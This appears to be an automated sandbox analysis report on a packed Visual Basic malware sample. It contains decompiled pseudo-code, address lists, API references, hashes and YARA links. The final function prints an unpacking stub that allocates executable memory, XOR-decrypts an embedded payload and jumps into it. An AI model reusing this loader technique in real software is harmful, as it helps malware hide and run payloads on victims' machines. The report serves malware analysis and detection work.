							_t665 = _t665 ^  *(_t688 - 0x48ee309a);
							asm("cdq");
							asm("iretw");
							asm("adc [edi+0xaa000c], esi");
							asm("pushad");
							asm("rcl dword [ebx], cl");
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							 *_t657 =  *_t657 + _t657;
							goto L5;
						}
						L6:
						_push(0x74657661);
					}
				}
				_t373 =  *0xd0903;
				 *_t665 =  *_t665 + 1;
				asm("sbb eax, [eax]");
				 *_t373 =  *_t373 + _t373;
				 *0x73694c00 =  *0x73694c00 | _t373;
				if( *0x73694c00 != 0) {
					 *_t373 =  *_t373 + _t688;
					_t688 = _t688 +  *((intOrPtr*)(_t734 + 0x11040b05));
					_t645 = _t373 + 0x2403ffd9;
					 *_t645 =  *_t645 + _t645;
					 *_t688 = _t688 +  *_t688;
					_push(es);
					 *((intOrPtr*)(_t665 + 0x6f)) =  *((intOrPtr*)(_t665 + 0x6f)) + _t645;
					asm("insd");
					asm("bound ebp, [edi+0x31]");
					 *_t734 =  *_t734 + _t645;
					asm("rol byte [edi], cl");
					_t373 = _t645 + 0x042100d8 | 0x00000004;
					 *((intOrPtr*)(_t760 + _t745 + 0x70 + _t745 * 2)) =  *((intOrPtr*)(_t760 + _t745 + 0x70 + _t745 * 2)) + _t688;
					 *[gs:ebx] =  *[gs:ebx] + _t715;
				}
				 *_t665 =  *_t665 + 1;
				_t375 = _t373 -  *_t373;
				 *_t375 =  *_t375 + _t375;
				_t376 = _t375 |  *_t745;
				 *((intOrPtr*)(_t665 + 0x68)) =  *((intOrPtr*)(_t665 + 0x68)) + _t376;
				asm("arpl [gs:ebx+0x31], bp");
				 *0x54000a01 =  *0x54000a01 + _t376;
				_t746 = _t745 - 1;
				_push(_t665);
				_push(_t777);
				_t736 = _t734;
				_push(_t665);
				_t689 = _t688 - 1;
				 *0x210081f =  *0x210081f + _t376;
				_t377 =  *_t715;
				asm("in eax, 0x0");
				asm("adc al, [ebx]");
				_t666 = _t665 + _t665;
				_t762 =  &_a1 +  *_t689;
				 *_t377 =  *_t377 + _t377;
				 *_t666 =  *_t666 + _t689;
				es = _t665;
				_t50 = _t736 + 0x70;
				 *_t50 =  *((intOrPtr*)(_t736 + 0x70)) + _t689;
				if( *_t50 == 0) {
					L38:
					_push(_t777);
					_t689 = _t689 - 1;
					_t736 = _t736 - 1;
					_t746 = _t746 - 1;
					 *0x2650752 =  *0x2650752 + _t377;
					_t666 = _t666 - 1;
					_t379 =  *_t689 + 0x12;
					 *_t379 =  *_t379 + _t379;
					 *_t666 =  *_t666 + 1;
					_t377 = _t379 ^  *_t379;
					 *_t377 =  *_t377 + _t377;
					_push(cs);
				} else {
					asm("outsd");
					asm("outsb");
					 *_t377 =  *_t377 ^ _t377;
					_push(es);
					 *_t377 =  *_t377 + _t689;
					_t52 = _t715 + 0x72;
					 *_t52 =  *((intOrPtr*)(_t715 + 0x72)) + _t377;
					asm("popad");
					if( *_t52 != 0) {
						asm("popad");
						asm("arpl [eax], bp");
						asm("rol byte [ecx], 1");
						asm("les eax, [edx+edx]");
						_t638 = _t377 + 0x83507fd +  *((intOrPtr*)(_t377 + 0x83507fd));
						 *_t666 =  *_t666 + 1;
						 *_t638 =  *_t638 ^ _t638;
						 *_t638 =  *_t638 + _t638;
						_t639 = _t638 | 0x00000008;
						 *((intOrPtr*)(_t666 + 0x6f)) =  *((intOrPtr*)(_t666 + 0x6f)) + _t639;
						asm("insd");
						asm("insd");
						asm("popad");
						asm("outsb");
						 *[fs:eax] =  *[fs:eax] ^ _t639;
						_t640 = 1 + _t639;
						_push(cs);
						 *((intOrPtr*)(_t715 + 0x49)) =  *((intOrPtr*)(_t715 + 0x49)) + _t640;
						_t791 = 1 + _t777;
						_push(_t791);
						_t777 = _t791 - 1;
						_t762 =  &_a1;
						_t741 = _t736 - 1;
						_t757 = _t746 + 1 - 1;
						_push(_t666);
						 *((intOrPtr*)(_t666 + _t640 * 4)) =  *((intOrPtr*)(_t666 + _t640 * 4)) + _t640;
						_t710 = _t689 + _t666;
						_push(es);
						if(_t710 == 0) {
							_t666 = _t666 - 1;
						}
						_t715 = _t715 +  *_t710;
						 *_t640 =  *_t640 + _t640;
						 *_t666 =  *_t666 + 1;
						_t641 = _t640 -  *_t640;
						 *_t641 =  *_t641 + _t641;
						_t642 = _t641 | 0x72460006;
						asm("popad");
						asm("insd");
						 *[gs:eax] =  *[gs:eax] ^ _t642;
						_t377 = _t642 +  *_t710 |  *(_t642 +  *_t710);
						_t746 = _t757 - 1;
						_push(_t666);
						_push(_t777);
						_t736 = _t741 + 1;
						_t689 = _t710 + 1;
						goto L38;
					}
				}
				_push(es);
				 *((intOrPtr*)(_t689 + 0x62)) =  *((intOrPtr*)(_t689 + 0x62)) + _t689;
				asm("gs insb");
				 *_t377 =  *_t377 ^ _t377;
				 *_t689 =  *_t689 + _t377;
				asm("adc al, [eax]");
				_push(_t762);
				if( *_t689 < 0) {
					L44:
					asm("aaa");
					_t380 = 1 + _t377;
					 *_t736 =  *_t736 + _t380;
					 *_t380 =  *_t380 + _t380;
					 *((intOrPtr*)(_t380 + 0x7004036)) =  *((intOrPtr*)(_t380 + 0x7004036)) + _t715;
					 *_t380 =  *_t380 + _t380;
					 *((intOrPtr*)(_t380 + 0x36)) =  *((intOrPtr*)(_t380 + 0x36)) + _t666;
					_t377 = _t380 + 1;
					 *_t736 =  *_t736 + _t377;
				} else {
					_t762 =  *(_t666 + 0x65) * 0x70;
					_t825 = _t762;
					if(_t825 >= 0) {
						asm("a16 jb 0x64");
						asm("insd");
						asm("insd");
						if(_t825 != 0) {
							 *0x61104b6 =  *0x61104b6 + _t377;
							asm("daa");
							asm("lds eax, [edi]");
							asm("adc cl, [ebx]");
							_t666 = _t666 + _t666;
							_t777 = _t777 +  *_t666;
							 *_t377 =  *_t377 + _t377;
							 *_t736 =  *_t736 + _t689;
							_t634 = _t377 + 0x6e694c00;
							 *[gs:eax] =  *[gs:eax] ^ _t634;
							ss = es;
							_t689 = _t689 +  *_t634;
							_pop(es);
							 *_t634 =  *_t634 + _t634;
							_t636 = _t634 + 0x00000098 | 0x00050000;
							asm("sldt word [eax]");
							_push(es);
							asm("rcl byte [ecx], 1");
							 *_t636 =  *_t636 + _t636;
							 *_t715 = 1 +  *_t715;
							_t377 = _t636;
						}
						 *_t746 =  *_t746 + _t377;
						 *_t377 =  *_t377 + _t377;
						_t377 = _t377 + _t666 + 2;
						 *_t736 =  *_t736 + _t377;
						 *_t377 =  *_t377 + _t377;
						 *((intOrPtr*)(_t377 + 0x7004037)) =  *((intOrPtr*)(_t377 + 0x7004037)) + _t377;
						 *_t377 =  *_t377 + _t377;
						 *((intOrPtr*)(_t736 + _t746 + 0x40)) =  *((intOrPtr*)(_t736 + _t746 + 0x40)) + _t666;
						 *_t736 =  *_t736 + _t377;
						 *_t377 =  *_t377 + _t377;
						 *((intOrPtr*)(_t736 + _t746)) =  *((intOrPtr*)(_t736 + _t746)) + _t689;
						goto L44;
					}
				}
				 *_t377 =  *_t377 + _t377;
				 *_t377 =  *_t377 + _t666;
				_t381 = 1 + _t377;
				 *_t736 =  *_t736 + _t381;
				 *_t381 =  *_t381 + _t381;
				 *((intOrPtr*)(_t762 + _t746 + 0x42560040)) =  *((intOrPtr*)(_t762 + _t746 + 0x42560040)) + _t715;
				_t382 = _t381 ^ 0x2a263621;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				 *_t746 =  *_t746 + _t666;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				_t383 = _t382 |  *_t382;
				 *(_t383 + _t383) =  *(_t383 + _t383) | _t383;
				 *_t383 =  *_t383 + _t383;
				 *_t383 =  *_t383 + _t383;
				 *_t383 =  *_t383 + _t383;
				 *_t383 =  *_t383 + _t383;
				 *((intOrPtr*)(_t736 + _t666 - 0x801ffc0)) =  *((intOrPtr*)(_t736 + _t666 - 0x801ffc0)) + _t666;
				_t667 = _t666 + _t666;
				asm("invalid");
				 *1 =  *1 | 0x00000001;
				 *1 = 1 +  *1;
				 *1 = 1 +  *1;
				 *1 = 1 +  *1;
				_t385 = 1 +  *1;
				 *_t385 =  *_t385 + _t385;
				goto 0xdc401c91;
				asm("sbb al, 0x40");
				 *((intOrPtr*)(_t762 + _t667 + 0x40)) =  *((intOrPtr*)(_t762 + _t667 + 0x40)) + _t667;
				 *((intOrPtr*)(_t385 + 0x78004018)) =  *((intOrPtr*)(_t385 + 0x78004018)) + _t715;
				 *_t385 =  *_t385 + 1;
				 *((intOrPtr*)(_t385 - 0x74000000)) =  *((intOrPtr*)(_t385 - 0x74000000)) + 1;
				 *_t385 =  *_t385 + 1;
				 *_t762 =  *_t762 + _t689;
				 *_t385 =  *_t385 + 1;
				 *_t385 =  *_t385 + 1;
				 *_t385 =  *_t385 + 1;
				 *_t385 =  *_t385 + 1;
				 *_t385 =  *_t385 + 1;
				 *_t385 =  *_t385 + 1;
				 *_t385 =  *_t385 + 1;
				_t95 = _t385 + 0x65;
				 *_t95 =  *((intOrPtr*)(_t385 + 0x65)) + _t715;
				_t830 =  *_t95;
				if(_t830 == 0) {
					L50:
					asm("sbb [eax], al");
					goto L51;
				} else {
					if(_t830 < 0) {
						L51:
						 *((intOrPtr*)(_t385 + _t385)) =  *((intOrPtr*)(_t385 + _t385)) + _t689;
						 *_t385 =  *_t385 + _t715;
						 *_t385 =  *_t385 + _t385;
						_t386 = _t762;
						asm("lock scasd");
						if( *_t385 < 0) {
							_t385 = _t386 - 0xde + 1;
							_pop(_t667);
							asm("adc edx, ecx");
							goto L53;
						}
					} else {
						 *[fs:ecx+0x53] =  *[fs:ecx+0x53] + 1;
						_push(_t385);
						_t689 = _t689;
						_t715 = _t777;
						_t762 =  &_a1;
						_t777 = 1 + _t777;
						 *_t385 =  *_t385 + 1;
						_t667 = _t667 + 2;
						asm("outsd");
						asm("arpl [ebx+0x65], bp");
						if(_t667 < 0) {
							L53:
							asm("clc");
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t715 =  *_t715 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							asm("cmc");
							asm("in al, dx");
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							 *_t385 =  *_t385 + _t385;
							asm("cld");
							_t777 = 1 + _t777;
							_t386 = _t385 + 1;
							 *((intOrPtr*)(_t386 + _t386 + 0x2200000)) =  *((intOrPtr*)(_t386 + _t386 + 0x2200000)) + _t667;
							 *_t386 =  *_t386 + _t386;
							 *_t386 =  *_t386 + _t386;
							 *_t386 =  *_t386 + _t386;
						} else {
							 *[fs:eax] = 1 +  *[fs:eax];
							 *_t385 =  *_t385 + _t715;
							 *_t385 =  *_t385 + 1;
							asm("stc");
							_pop(_t777);
							_t736 = _t736 - 1;
							asm("movsb");
							_pop(_t630);
							_t715 = _t715 >> 0xc;
							asm("invalid");
							asm("scasb");
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							_pop(es);
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							 *_t630 =  *_t630 + 1;
							_push(cs);
							_t631 = _t630 +  *_t630;
							 *_t631 =  *_t631 + 1;
							 *_t631 =  *_t631 + 1;
							_t385 = _t631 + _t715;
							goto L50;
						}
					}
				}
				 *_t386 =  *_t386 + _t386;
				 *_t386 =  *_t386 + _t386;
				 *_t386 =  *_t386 + _t386;
				_t387 = _t386 + _t715;
				 *_t387 =  *_t387 + _t387;
				_t388 = _t387 + _t667;
				 *_t388 =  *_t388 + _t388;
				 *_t388 =  *_t388 + _t689;
				 *_t388 =  *_t388 + _t388;
				_a1207959553 = _a1207959553 + _t689;
				 *_t388 =  *_t388 + _t388;
				 *_t388 =  *_t388 + _t388;
				 *_t388 =  *_t388 + _t388;
				_t690 = _t689 + _t715;
				 *_t388 =  *_t388 + _t388;
				 *_t715 =  *_t715 + _t388;
				 *_t667 =  *_t667 + _t715;
				_t390 = _t388 +  *_t388 +  *((intOrPtr*)(_t388 +  *_t388));
				 *_t390 =  *_t390 + _t390;
				 *_t390 =  *_t390 + _t390;
				_a1959342778 = _a1959342778 + _t390;
				asm("sbb edx, [eax]");
				asm("movsd");
				asm("insb");
				 *((intOrPtr*)(_t715 - 0x2397ca00)) =  *((intOrPtr*)(_t715 - 0x2397ca00)) + _t690;
				_t110 = _t715 + 0x4374c932;
				_t737 =  *_t110;
				 *_t110 = _t736;
				asm("sbb edx, [eax]");
				asm("movsd");
				asm("insb");
				 *((intOrPtr*)(_t715 - 0x2397ca00)) =  *((intOrPtr*)(_t715 - 0x2397ca00)) + _t690;
				_t391 =  *0x774d6cc9;
				asm("fxch7 st7");
				asm("adc [esi-0x365fff8c], ecx");
				asm("invalid");
				asm("clc");
				asm("aaa");
				asm("salc");
				asm("pushad");
				_t778 = 1 + _t777;
				asm("popad");
				asm("fcomip st0, st4");
				_t716 = 1 + _t715;
				asm("das");
				_push(0x533441b0);
				_t692 = 0xcd;
				switch(0xa982957b) {
				}
			}

0x004018a4
0x004018a4
0x004018a4
0x004018a9
0x004018ae
0x004018b0
0x004018b2
0x004018b4
0x004018b6
0x004018b8
0x004018b9
0x004018bb
0x004018bd
0x004018bf
0x004018c3
0x004018c7
0x004018ca
0x004018cb
0x004018d1
0x004018d3
0x004018d5
0x004018d7
0x004018d9
0x004018db
0x004018dd
0x004018df
0x004018df
0x004018e2
0x004018e5
0x0040194c
0x0040194c
0x00401952
0x00401954
0x00401956
0x0040195b
0x0040195b
0x00000000
0x004018e7
0x004018e7
0x004018eb
0x004018ed
0x004018ee
0x004018ef
0x004018f1
0x004018f3
0x004018f5
0x004018f6
0x004018f8
0x004018fa
0x004018fc
0x004018ff
0x00401900
0x00401900
0x00401901
0x00401902
0x00401903
0x00401906
0x00401908
0x00401909
0x0040197c
0x004019f1
0x004019f1
0x004019f3
0x004019f5
0x004019f7
0x004019f9
0x004019fc
0x00401a00
0x00401a06
0x00401a07
0x00401a08
0x00401a0a
0x00401a0b
0x00401a0e
0x00401a0f
0x00401a11
0x00401a13
0x00401a14
0x00401a15
0x00401a16
0x00401a17
0x00401a18
0x00000000
0x0040197e
0x0040197e
0x00401980
0x00401982
0x00401987
0x00401988
0x00401989
0x0040198b
0x0040198d
0x0040198f
0x00401995
0x00401996
0x00401998
0x0040199b
0x0040199d
0x004019a3
0x004019d6
0x004019d6
0x004019d6
0x004019d8
0x004019d9
0x004019db
0x004019dc
0x00000000
0x004019de
0x004019de
0x00000000
0x004019e0
0x004019e0
0x004019e2
0x004019e4
0x004019ea
0x004019f0
0x00000000
0x004019f0
0x00401a1c
0x00401a1c
0x00401a1d
0x00401a1d
0x00000000
0x004019e0
0x004019de
0x004019a5
0x004019a5
0x004019ab
0x004019b1
0x004019b1
0x004019b6
0x00401a27
0x00401a27
0x00401a29
0x00401a2b
0x00401a2d
0x00401a30
0x00401a31
0x00401a34
0x00401a3b
0x00401a3e
0x00401a41
0x00401a41
0x00401a41
0x00401a44
0x00401a47
0x00401a47
0x00401a49
0x00401a49
0x00401a50
0x00401a51
0x00401a52
0x00401a54
0x00401a5a
0x00401a5c
0x00401a62
0x00401a65
0x00401a66
0x00401a67
0x00401a69
0x00401a72
0x00401a74
0x00401a77
0x00401a79
0x00401a7b
0x00401a7d
0x00401a7f
0x00401a81
0x00401a84
0x00401a85
0x00401a86
0x00401a8a
0x00401a8b
0x00401a8d
0x00401a8f
0x00401a95
0x00401a97
0x00401a98
0x00401a9a
0x00401a9c
0x00401a9e
0x00401a9f
0x00401aa0
0x00401aa3
0x00401aa4
0x00401aa5
0x00401aa7
0x00401aa9
0x00401aa9
0x004019b8
0x004019b8
0x00401a23
0x00401a24
0x00401a26
0x00000000
0x004019ba
0x004019ba
0x004019bd
0x004019c4
0x004019c6
0x004019c8
0x004019c9
0x004019cb
0x004019cc
0x004019cf
0x004019d0
0x004019d4
0x00000000
0x004019d4
0x004019b8
0x004019b6
0x004019a3
0x0040190b
0x0040190b
0x0040190f
0x00401911
0x00401912
0x0040191a
0x0040191b
0x0040191c
0x0040191d
0x0040191e
0x00401920
0x00401926
0x00401927
0x0040192d
0x0040192f
0x00401931
0x00401933
0x00401935
0x00401937
0x00401939
0x0040193b
0x0040193d
0x0040193f
0x00401941
0x00401943
0x00401945
0x00401947
0x00401949
0x0040194b
0x00000000
0x0040194b
0x00401960
0x00401960
0x00401960
0x00401909
0x00401ab0
0x00401ab5
0x00401ab7
0x00401ab9
0x00401abb
0x00401ac1
0x00401ac3
0x00401ac9
0x00401acf
0x00401ad4
0x00401ad6
0x00401ad8
0x00401ad9
0x00401adc
0x00401add
0x00401ae0
0x00401ae7
0x00401aeb
0x00401aed
0x00401af1
0x00401af1
0x00401af6
0x00401af8
0x00401afa
0x00401afc
0x00401afe
0x00401b01
0x00401b05
0x00401b0c
0x00401b0e
0x00401b0f
0x00401b10
0x00401b11
0x00401b12
0x00401b14
0x00401b1a
0x00401b1c
0x00401b1e
0x00401b20
0x00401b22
0x00401b24
0x00401b26
0x00401b28
0x00401b29
0x00401b29
0x00401b2c
0x00401b97
0x00401b97
0x00401b98
0x00401b99
0x00401b9a
0x00401b9b
0x00401ba3
0x00401ba4
0x00401ba6
0x00401ba8
0x00401baa
0x00401bac
0x00401bae
0x00401b2e
0x00401b2e
0x00401b2f
0x00401b30
0x00401b32
0x00401b33
0x00401b35
0x00401b35
0x00401b38
0x00401b39
0x00401b3b
0x00401b3c
0x00401b44
0x00401b46
0x00401b49
0x00401b4b
0x00401b4d
0x00401b4f
0x00401b51
0x00401b53
0x00401b56
0x00401b57
0x00401b58
0x00401b59
0x00401b5a
0x00401b5d
0x00401b5f
0x00401b60
0x00401b66
0x00401b67
0x00401b69
0x00401b6a
0x00401b6c
0x00401b6d
0x00401b6e
0x00401b6f
0x00401b72
0x00401b74
0x00401b75
0x00401b77
0x00401b77
0x00401b78
0x00401b7a
0x00401b7c
0x00401b7e
0x00401b80
0x00401b82
0x00401b87
0x00401b88
0x00401b89
0x00401b8e
0x00401b91
0x00401b92
0x00401b93
0x00401b95
0x00401b96
0x00000000
0x00401b96
0x00401b39
0x00401baf
0x00401bb0
0x00401bb4
0x00401bb6
0x00401bb8
0x00401bba
0x00401bbc
0x00401bbd
0x00401c21
0x00401c21
0x00401c22
0x00401c23
0x00401c25
0x00401c27
0x00401c2d
0x00401c2f
0x00401c32
0x00401c33
0x00401bc0
0x00401bc0
0x00401bc0
0x00401bc4
0x00401bc6
0x00401bc9
0x00401bca
0x00401bcb
0x00401bce
0x00401bd4
0x00401bd6
0x00401bd8
0x00401bda
0x00401bdc
0x00401bde
0x00401be0
0x00401be2
0x00401be7
0x00401bea
0x00401beb
0x00401bed
0x00401bee
0x00401bf2
0x00401bf7
0x00401bfa
0x00401bfb
0x00401bfd
0x00401bff
0x00401c01
0x00401c01
0x00401c03
0x00401c05
0x00401c0a
0x00401c0b
0x00401c0d
0x00401c0f
0x00401c15
0x00401c17
0x00401c1b
0x00401c1d
0x00401c1f
0x00000000
0x00401c1f
0x00401bc4
0x00401c35
0x00401c37
0x00401c39
0x00401c3b
0x00401c3d
0x00401c3f
0x00401c46
0x00401c4b
0x00401c4d
0x00401c4f
0x00401c51
0x00401c53
0x00401c55
0x00401c57
0x00401c5a
0x00401c5c
0x00401c5e
0x00401c60
0x00401c62
0x00401c64
0x00401c66
0x00401c68
0x00401c6b
0x00401c6d
0x00401c6f
0x00401c71
0x00401c73
0x00401c7c
0x00401c7e
0x00401c80
0x00401c82
0x00401c84
0x00401c86
0x00401c88
0x00401c8a
0x00401c8c
0x00401c91
0x00401c93
0x00401c97
0x00401c9d
0x00401c9f
0x00401ca5
0x00401ca7
0x00401cad
0x00401caf
0x00401cb1
0x00401cb3
0x00401cb5
0x00401cb7
0x00401cb9
0x00401cbb
0x00401cbb
0x00401cbb
0x00401cbe
0x00401d25
0x00401d25
0x00000000
0x00401cc0
0x00401cc0
0x00401d27
0x00401d27
0x00401d2b
0x00401d2e
0x00401d30
0x00401d31
0x00401d33
0x00401d37
0x00401d3a
0x00401d3b
0x00000000
0x00401d3b
0x00401cc2
0x00401cc2
0x00401cc7
0x00401ccb
0x00401ccc
0x00401ccd
0x00401cce
0x00401ccf
0x00401cd1
0x00401cd2
0x00401cd3
0x00401cd6
0x00401d3d
0x00401d3e
0x00401d40
0x00401d42
0x00401d44
0x00401d46
0x00401d48
0x00401d4a
0x00401d4c
0x00401d4e
0x00401d50
0x00401d52
0x00401d54
0x00401d56
0x00401d58
0x00401d5a
0x00401d5c
0x00401d5e
0x00401d60
0x00401d62
0x00401d64
0x00401d66
0x00401d68
0x00401d6a
0x00401d6c
0x00401d6d
0x00401d6e
0x00401d70
0x00401d72
0x00401d74
0x00401d75
0x00401d76
0x00401d77
0x00401d7e
0x00401d82
0x00401d84
0x00401cd8
0x00401cd8
0x00401cdb
0x00401cde
0x00401ce3
0x00401ce6
0x00401ce7
0x00401ce8
0x00401ce9
0x00401cea
0x00401ced
0x00401cef
0x00401cf0
0x00401cf2
0x00401cf4
0x00401cf6
0x00401cf8
0x00401cfa
0x00401cfc
0x00401cfe
0x00401d00
0x00401d02
0x00401d05
0x00401d06
0x00401d08
0x00401d0a
0x00401d0c
0x00401d0e
0x00401d10
0x00401d12
0x00401d14
0x00401d16
0x00401d18
0x00401d1a
0x00401d1c
0x00401d1d
0x00401d1f
0x00401d21
0x00401d23
0x00000000
0x00401d23
0x00401cd6
0x00401cc0
0x00401d85
0x00401d87
0x00401d89
0x00401d8b
0x00401d8d
0x00401d8f
0x00401d91
0x00401d93
0x00401d95
0x00401d97
0x00401d9d
0x00401d9f
0x00401da1
0x00401da3
0x00401da5
0x00401da7
0x00401dab
0x00401dad
0x00401daf
0x00401db1
0x00401db3
0x00401dba
0x00401dbc
0x00401dbd
0x00401dbe
0x00401dc4
0x00401dc4
0x00401dc4
0x00401dca
0x00401dcc
0x00401dcd
0x00401dce
0x00401dd4
0x00401dd9
0x00401ddb
0x00401de1
0x00401de3
0x00401de4
0x00401de5
0x00401de6
0x00401de7
0x00401de8
0x00401de9
0x00401deb
0x00401df1
0x00401df4
0x00401df5
0x00401df8
0x00000000

APIs

#100.MSVBVM60(VB5!6&*), ref: 004018A9

Strings

VB5!6&*, xrefs: 004018A4, 00401A07

Memory Dump Source

Source File: 00000004.00000002.2370102402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2370097525.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2370111465.0000000000413000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.2370121639.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2370127742.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: caa4062a53d87e7c6a5da01327214e39470ec7781a7ae026b9700bf00363b776
Instruction ID: 9fd2e5d62127e0354352e12a12072ef1d464c6871ef3d51b8bf72fcd551c9c89
Opcode Fuzzy Hash: caa4062a53d87e7c6a5da01327214e39470ec7781a7ae026b9700bf00363b776
Instruction Fuzzy Hash: F1E1767144E7C18FD3039B749CA56A27FB4EE1331431E05EBC8C1CA4A3E22CA95AD766

Uniqueness

Uniqueness Score: -1.00%

Function 003C6F73, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 263memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 003C70BA

Strings

}4zW, xrefs: 003C6EBF

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: }4zW
API String ID: 2167126740-3148660538
Opcode ID: 973ff43657a1fe5b8fdc251511e893282ee9f5c4739ff8dc4ce17f89750ecf70
Instruction ID: 4277b838134b2b15a6c89c90fcf34be2c6aa2e1ba72cac002e4df8f3f6993345
Opcode Fuzzy Hash: 973ff43657a1fe5b8fdc251511e893282ee9f5c4739ff8dc4ce17f89750ecf70
Instruction Fuzzy Hash: 6091783115C2898FCB379E249C66BEDBFB1AF9D314F56005DEC85CBA52E2708D068B85

Uniqueness

Uniqueness Score: -1.00%

Function 003C6E96, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 221memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 003C70BA

Strings

}4zW, xrefs: 003C6EBF

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: }4zW
API String ID: 2167126740-3148660538
Opcode ID: afc24944d01a01d1fd0ec5d84f16cb0afad890095976a55536f203e3a354e452
Instruction ID: 1667af530577a7013dceba6c68037556ff30a70b19a945d06c423988b5c58dfb
Opcode Fuzzy Hash: afc24944d01a01d1fd0ec5d84f16cb0afad890095976a55536f203e3a354e452
Instruction Fuzzy Hash: 5D71F23115C2898FCB329E248C55BEDBF61EF9D310F56041DED89DBA52E6308E068F85

Uniqueness

Uniqueness Score: -1.00%

Function 003C6EE4, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 003C70BA

Strings

}4zW, xrefs: 003C6EBF

Memory Dump Source

Source File: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, Offset: 003C0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: }4zW
API String ID: 2167126740-3148660538
Opcode ID: 11fae0d876b1fd5ceb4d6429c8a5d4ed563ea967d6265a36d37c66216da2bbeb
Instruction ID: a2c1915f8d23470996b8a795c11a44bb5561f0bbeaacb8e1256cfe5b1f8d2b31
Opcode Fuzzy Hash: 11fae0d876b1fd5ceb4d6429c8a5d4ed563ea967d6265a36d37c66216da2bbeb
Instruction Fuzzy Hash: 0A71353514C2898FDB329E248D66BEDBF71AF9D314F56040EEC85DBA51E7308D058B86

Uniqueness

Uniqueness Score: -1.00%

Function 00405732, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 173
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00405732() {
				intOrPtr* _t10;
				intOrPtr* _t17;
				void* _t31;
				void* _t32;
				void* _t41;
				void* _t54;
				signed int _t56;

				 *_t10 =  *_t10 + 1;
				_push(_t32 + _t32);
				 *((intOrPtr*)(_t10 + _t56 * 8)) =  *((intOrPtr*)(_t10 + _t56 * 8)) - _t54;
				_t17 =  *((intOrPtr*)(0x40100c));
				do {
					_t17 = _t17 + 0xffffffff;
					asm("pushfd");
					asm("popfd");
				} while ( *_t17 != 0x38fd5933);
				_t31 = VirtualAlloc(0, 0x11000, 0x5c449859, 0x40); // executed
				_t41 = 0xc6f8;
				do {
					 *(_t31 + _t41) = 0 ^  *(0x4059b7 + _t41);
					 *(_t31 + _t41) =  *(_t31 + _t41) ^ 0xb9e28c6b;
					_t41 = _t41 - 0x242 + 0x23e;
				} while (_t41 >= 0);
				goto __eax;
			}

0x00405734
0x00405736
0x00405737
0x0040578b
0x004057f0
0x004057f4
0x004057ff
0x00405800
0x00405800
0x00405930
0x00405941
0x0040594f
0x0040596b
0x00405977
0x004059a1
0x004059a1
0x004059ad

APIs

VirtualAlloc.KERNELBASE(00000000,00011000,-5BDD0DE3,15C1F4E2), ref: 00405930

Strings

